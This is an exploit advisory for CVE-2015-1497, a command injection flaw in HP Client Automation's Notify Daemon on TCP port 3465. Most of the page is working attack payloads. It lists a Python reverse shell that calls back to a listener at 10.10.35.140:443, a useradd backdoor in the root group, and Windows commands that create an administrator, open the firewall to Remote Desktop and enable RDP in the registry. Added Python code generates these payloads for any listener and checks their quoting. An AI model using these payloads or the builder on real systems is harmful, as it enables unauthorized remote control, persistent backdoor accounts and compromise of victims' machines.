CVE ID
CVE-2015-1497
Date: [10/10/2016]
Exploit Author: [SlidingWindow],Twitter: @kapil_khot
Vendor Homepage: [Previously HP, now http://www.persistentsys.com/]
Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
Tested on: [Windows 7 and CentOS release 6.7 (Final)]
IMPACTS
CVSS Severity (version 2.0)
CVSS v2 Base Score: 10.0 HIGH
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS VERSION 2 METRICS
Access Vector: Network exploitable
Access Complexity: Low
Affected Vendors: Hewlett Packard
CAN RUN THE FOLLOWING COMMANDS ON LINUX AND WINDOWS TARGETS
- Useradd payload (Linux; the -p value is a crypt(3) password hash): hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
- Reverse shell payload (Linux): hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
- Add local user payload (Windows): hide hide cmd.exe /c net user hack3r "hack3r" /add
- Add user to Administrators payload (Windows): hide hide cmd.exe /c net localgroup administrators hack3r /add
- Add user to Remote Desktop Users payload (Windows): hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
- Allow Remote Desktop through the firewall payload (Windows, legacy netsh syntax with positional arguments): hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
- Same firewall change with named parameters (Windows): hide hide cmd.exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
- Enable Remote Desktop connections in the registry payload (Windows): hide hide cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
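The Linux payloads above nest three quoting layers (the request itself, sh -c, and python -c), and a single mis-escaped quote fails silently on the target. The following is an added example, not the exploit script from this advisory or vendor code: it builds those two payloads with shlex so each layer is quoted for a POSIX shell, then unwraps a payload layer by layer and compiles the embedded Python to prove the quoting survived. The "hide hide" prefix and the values 10.10.35.140, 443, amiroot and ID/JlXFIWowsE are reused from the page as sample input; how the exploit script frames the string on TCP port 3465 is not shown on the page, so the helpers stop at the command text, and the checker covers only the sh -c wrapper, not the Windows cmd.exe lines.

```python
import shlex

# Every request listed on this page opens with two placeholder fields.
PREFIX = "hide hide"

# Copies of the two Linux payloads exactly as listed above, kept here as
# constructed test input for the checker.
ADVISORY_USERADD = "hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'"
ADVISORY_REVERSE_SHELL = r'''hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"'''


def reverse_shell_payload(lhost: str, lport: int) -> str:
    """Linux reverse shell from the advisory, parameterised on the listener.

    shlex.join quotes each layer for POSIX sh: the Python one-liner is
    wrapped for `python -c`, and that whole command is wrapped again for
    `sh -c`, so neither shell alters the code before python sees it.
    """
    code = (
        "import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        'p=subprocess.call(["/bin/sh","-i"]);'
    )
    script = shlex.join(["python", "-c", code])
    return f"{PREFIX} {shlex.join(['sh', '-c', script])}"


def useradd_payload(user: str, crypt_hash: str, group: str = "root") -> str:
    """Backdoor-account payload from the advisory; crypt_hash is crypt(3) text."""
    script = shlex.join(["useradd", user, "-p", crypt_hash, "-g", group])
    return f"{PREFIX} {shlex.join(['sh', '-c', script])}"


def parse_payload(payload: str) -> dict:
    """Unwrap a 'hide hide sh -c ...' payload and validate every layer.

    Returns the argv the daemon would receive, the argv that sh -c would
    execute, and for python -c payloads whether the embedded code parses.
    Raises ValueError on a malformed layer (for example an unbalanced
    quote), which is the failure you want to see before sending, not on
    the target with no output.
    """
    # POSIX rules: inside "..." a \" is a literal quote, inside '...' nothing is special.
    argv = shlex.split(payload)
    if argv[:2] != PREFIX.split() or argv[2:4] != ["sh", "-c"] or len(argv) != 5:
        raise ValueError(f"unexpected framing: {argv}")
    inner = shlex.split(argv[4])  # ValueError here means sh -c's script is broken
    result = {"argv": argv, "inner": inner, "python_ok": None}
    if inner[:2] == ["python", "-c"]:
        compile(inner[2], "<payload>", "exec")  # SyntaxError if quoting ate a char
        result["python_ok"] = True
    return result


if __name__ == "__main__":
    for p in (reverse_shell_payload("10.10.35.140", 443),
              useradd_payload("amiroot", "ID/JlXFIWowsE")):
        print(p)
        print("  sh -c runs:", parse_payload(p)["inner"])
```

The builder reproduces the advisory's reverse shell byte for byte apart from whitespace, so the checker can be pointed at either the generated or the hand-written form; feeding it a payload with a dropped closing quote raises ValueError from the inner shlex.split instead of returning a half-parsed command.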
VULNERABILITY DETAILS
HP Client Automation, now distributed as Persistent Systems Client Automation, contains a command injection vulnerability that allows remote attackers to execute arbitrary commands via a crafted request to TCP port 3465. The vulnerability exists in the Notify Daemon (radexecd.exe), which by default does not authenticate execution requests. The Metasploit module for this issue has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2 and CentOS 5. The main impacts of this vulnerability are:
- Allows unauthorized disclosure of information.
- Allows unauthorized modification.
- Allows disruption of service.